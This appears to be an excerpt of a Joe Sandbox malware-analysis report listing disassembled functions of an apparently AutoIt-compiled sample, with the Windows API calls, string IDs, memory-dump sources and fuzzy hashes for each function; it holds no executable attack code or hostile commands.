                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                          • String ID:
                                                                          • API String ID: 4072528602-0
                                                                          • Opcode ID: cce6e4edd21a73fcb457a2d7ff7ed201a933d8b73c76f883571ebc1e03446d6b
                                                                          • Instruction ID: c641a8a03eb7325d814268e3fa011334940e38284dbdfbf7e25dba70c2695716
                                                                          • Opcode Fuzzy Hash: cce6e4edd21a73fcb457a2d7ff7ed201a933d8b73c76f883571ebc1e03446d6b
                                                                          • Instruction Fuzzy Hash: FF71AE38605205EFDF239F65E9D4FBABBB9EF09300F15405AE941973A2C732A950EB50
                                                                          Function 0038F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0038F448
                                                                          • _memset.LIBCMT ref: 0038F511
                                                                          • ShellExecuteExW.SHELL32(?), ref: 0038F556
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                            • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
                                                                          • GetProcessId.KERNEL32(00000000), ref: 0038F5CD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0038F5FC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                          • String ID: @
                                                                          • API String ID: 3522835683-2766056989
                                                                          • Opcode ID: b44b29afa185c1ca3ee13da5de7dc31fcf78ad32698d0e9762e4d80ee0e6bb5d
                                                                          • Instruction ID: 878d42bfc252d54b884ea3ac309f46ad60adedc0b00ed1818fd54abca9fc024a
                                                                          • Opcode Fuzzy Hash: b44b29afa185c1ca3ee13da5de7dc31fcf78ad32698d0e9762e4d80ee0e6bb5d
                                                                          • Instruction Fuzzy Hash: E4619075A00619DFCB16EF64C4919AEB7F5FF4D310F1580AAE859AB351CB30AD41CB90
                                                                          Function 00370F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00370F8C
                                                                          • GetKeyboardState.USER32(?), ref: 00370FA1
                                                                          • SetKeyboardState.USER32(?), ref: 00371002
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00371030
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0037104F
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00371095
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003710B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: adab27fe63ba604e206d5a7b6b329e4f2949fa5afc18ab8363c94db0b7a40a90
                                                                          • Instruction ID: 9b30a1429fc29a2d67fb47e1a9ca7b8e452376374fa4abb3a0fc88a3eb8ce300
                                                                          • Opcode Fuzzy Hash: adab27fe63ba604e206d5a7b6b329e4f2949fa5afc18ab8363c94db0b7a40a90
                                                                          • Instruction Fuzzy Hash: 9A51D2A15047D57DFB3746388C05BBABEE95B06304F09C589E1DC898D3C2ADACD4D751
                                                                          Function 00370D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(00000000), ref: 00370DA5
                                                                          • GetKeyboardState.USER32(?), ref: 00370DBA
                                                                          • SetKeyboardState.USER32(?), ref: 00370E1B
                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00370E47
                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00370E64
                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00370EA8
                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00370EC9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 8b214edca3976c296b0948cd489edb9f5b8403d68a55b5b62b772e243dc73671
                                                                          • Instruction ID: f6acbc676bf81de08e5dd1fbfef419f96e2dabee9fbf763ed27a9635375e0c57
                                                                          • Opcode Fuzzy Hash: 8b214edca3976c296b0948cd489edb9f5b8403d68a55b5b62b772e243dc73671
                                                                          • Instruction Fuzzy Hash: 9F51F6A1504BD5BDFB3B87748C45B7ABEA95B06300F08C889F1DC9A8C3D399AC98D750
                                                                          Function 003755FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$LocalTime
                                                                          • String ID:
                                                                          • API String ID: 2945705084-0
                                                                          • Opcode ID: dc771435231f2076a2fc4122fb1df9a3fa1bfb59829dff9ba3b1d358d29cc2bd
                                                                          • Instruction ID: 4a9193e3cd73cb87257d7bc4b8c83400f6eaf5f18ad579e7ef8c2bae9c1a9922
                                                                          • Opcode Fuzzy Hash: dc771435231f2076a2fc4122fb1df9a3fa1bfb59829dff9ba3b1d358d29cc2bd
                                                                          • Instruction Fuzzy Hash: 8A419275D1061876CB17EBF48C869CFB3B89F05310F508966E518E7221EB34E255C7AA
                                                                          Function 0036D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0036D5D4
                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0036D60A
                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0036D61B
                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0036D69D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                          • String ID: ,,:$DllGetClassObject
                                                                          • API String ID: 753597075-3217529581
                                                                          • Opcode ID: fd563352644c272266268b8d2e6cbad6a568caeca0d1df7f7a0411a82290dbd4
                                                                          • Instruction ID: fb017d981e4cedf8136f472328e7f6b52c0c703654a735002d01507d53e8f5a2
                                                                          • Opcode Fuzzy Hash: fd563352644c272266268b8d2e6cbad6a568caeca0d1df7f7a0411a82290dbd4
                                                                          • Instruction Fuzzy Hash: E4415FB1B00205EFDB16DF64C884A9ABBA9EF44310F55C1A9ED0ADF209D7B1DD44CBA0
                                                                          Function 00373671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00373697,?), ref: 0037468B
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00373697,?), ref: 003746A4
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003736B7
                                                                          • _wcscmp.LIBCMT ref: 003736D3
                                                                          • MoveFileW.KERNEL32(?,?), ref: 003736EB
                                                                          • _wcscat.LIBCMT ref: 00373733
                                                                          • SHFileOperationW.SHELL32(?), ref: 0037379F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 1377345388-1173974218
                                                                          • Opcode ID: a0894604a3779891c73a50215c2ed0d053794ca8782c33d3cd5780d61aa740c5
                                                                          • Instruction ID: 525c55a849b795db4fec242483ad7ae72e9d674cf15c7260f80f9fe892091d77
                                                                          • Opcode Fuzzy Hash: a0894604a3779891c73a50215c2ed0d053794ca8782c33d3cd5780d61aa740c5
                                                                          • Instruction Fuzzy Hash: 0F416D71508345AEC767EF64C481ADFB7ECAF89380F00492EB49AC7251EB39D6898752
                                                                          Function 00397291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003972AA
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397351
                                                                          • IsMenu.USER32(?), ref: 00397369
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003973B1
                                                                          • DrawMenuBar.USER32 ref: 003973C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                          • String ID: 0
                                                                          • API String ID: 3866635326-4108050209
                                                                          • Opcode ID: 9f859637af809b7f76c89e1af16fcac7be1aaa4a26786ba4ae3ed2e24b868527
                                                                          • Instruction ID: 7c3a14b6ec68e05f7df2cc6cb280065643bed96c0ef110bb6e4da7b5cc50155b
                                                                          • Opcode Fuzzy Hash: 9f859637af809b7f76c89e1af16fcac7be1aaa4a26786ba4ae3ed2e24b868527
                                                                          • Instruction Fuzzy Hash: C9413779A14209EFDF22DF50D884A9ABBF8FB09310F15842AFD159B290D731AD50EF90
                                                                          Function 00390FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00390FD4
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00390FFE
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 003910B5
                                                                            • Part of subcall function 00390FA5: RegCloseKey.ADVAPI32(?), ref: 0039101B
                                                                            • Part of subcall function 00390FA5: FreeLibrary.KERNEL32(?), ref: 0039106D
                                                                            • Part of subcall function 00390FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00391090
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00391058
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: 88132146206fedec159393e4f4b260bcb183f11f966962e4526fbc53a5a98f0b
                                                                          • Instruction ID: 8957fc1e40263ca0e9ecc85e92d3957c1b34a99a6899dd68beaa0c8efef8180f
                                                                          • Opcode Fuzzy Hash: 88132146206fedec159393e4f4b260bcb183f11f966962e4526fbc53a5a98f0b
                                                                          • Instruction Fuzzy Hash: 5231EF71901109BFEF169F94DC89EFFB7BCEF08350F00016AE512E2251E6755E899AA0
                                                                          Function 003962CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003962EC
                                                                          • GetWindowLongW.USER32(01146948,000000F0), ref: 0039631F
                                                                          • GetWindowLongW.USER32(01146948,000000F0), ref: 00396354
                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00396386
                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003963B0
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003963C1
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003963DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 2178440468-0
                                                                          • Opcode ID: 2656fe3ed591ba0f21b6521c668b4770c103d89958769007fb1c66ac9fb5a266
                                                                          • Instruction ID: e1e766ab9633c54071e1dde026774d9b11a1462667c00b79ce98fb40f45f9834
                                                                          • Opcode Fuzzy Hash: 2656fe3ed591ba0f21b6521c668b4770c103d89958769007fb1c66ac9fb5a266
                                                                          • Instruction Fuzzy Hash: F531F2386462509FDB228F19ECC6F6937E9BB4A714F1A01A5F501CF2B1CB72A840AB50
                                                                          Function 0036DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DB2E
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DB54
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0036DB57
                                                                          • SysAllocString.OLEAUT32(?), ref: 0036DB75
                                                                          • SysFreeString.OLEAUT32(?), ref: 0036DB7E
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0036DBA3
                                                                          • SysAllocString.OLEAUT32(?), ref: 0036DBB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 5488497e6f918d98c154849bd18c5b32f345eb229d228f38f06136bffe2565ab
                                                                          • Instruction ID: f8a4b6ac25bb2e3d03626c6aa9ccb8b1f8767604097102eefcd5600b5b38bcac
                                                                          • Opcode Fuzzy Hash: 5488497e6f918d98c154849bd18c5b32f345eb229d228f38f06136bffe2565ab
                                                                          • Instruction Fuzzy Hash: 4021A436B00219AFDF11EFA9DC88CBB77ACEB09360B058566F914DB254DA71DC4187A4
                                                                          Function 00386173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00387D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00387DB6
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003861C6
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003861D5
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0038620E
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00386217
                                                                          • WSAGetLastError.WSOCK32 ref: 00386221
                                                                          • closesocket.WSOCK32(00000000), ref: 0038624A
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00386263
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 910771015-0
                                                                          • Opcode ID: d0ae3156d4c48800d808c712a299ed00c8b3dac421b5927c0078658bac77ab31
                                                                          • Instruction ID: 8a820e7338239383a85b0495413f519b1bff04e4a4da8ed65d752307ec004671
                                                                          • Opcode Fuzzy Hash: d0ae3156d4c48800d808c712a299ed00c8b3dac421b5927c0078658bac77ab31
                                                                          • Instruction Fuzzy Hash: 1131B531600208AFDF12AF64CC8ABBD77ADEF45751F1444AAFD05EB291CB71AD448B61
                                                                          Function 0036F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                          • API String ID: 1038674560-2734436370
                                                                          • Opcode ID: fd9fd25c7e63c430cd30e695388fffb05bd4cb43bf1a38d01192b02933ad4d82
                                                                          • Instruction ID: b1db7b97aed63291bcba238669c5f6e3af9d2b2e851dfaf7176d06bd93652ca5
                                                                          • Opcode Fuzzy Hash: fd9fd25c7e63c430cd30e695388fffb05bd4cb43bf1a38d01192b02933ad4d82
                                                                          • Instruction Fuzzy Hash: 512149B22045116ED227BA34FC03EA7739CEF56380F11C039F8468B099EB919D82C3A5
                                                                          Function 0036DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DC09
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DC2F
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0036DC32
                                                                          • SysAllocString.OLEAUT32 ref: 0036DC53
                                                                          • SysFreeString.OLEAUT32 ref: 0036DC5C
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0036DC76
                                                                          • SysAllocString.OLEAUT32(?), ref: 0036DC84
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 43aa93641b597fa0ee176b22a30c0cbb85b8c5ee1f43f1c16434b832f454d2c5
                                                                          • Instruction ID: 97c3689dad6f0e5200b630286789cdf729a873a9a53b70d0f4527517c9b9d575
                                                                          • Opcode Fuzzy Hash: 43aa93641b597fa0ee176b22a30c0cbb85b8c5ee1f43f1c16434b832f454d2c5
                                                                          • Instruction Fuzzy Hash: F0218335704208AFDB15EFA9DC88DAB77ECEB09360B11C126F914CB264DAB1DC41CB64
                                                                          Function 003975CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00311D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00311D73
                                                                            • Part of subcall function 00311D35: GetStockObject.GDI32(00000011), ref: 00311D87
                                                                            • Part of subcall function 00311D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00311D91
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00397632
                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0039763F
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0039764A
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00397659
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00397665
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
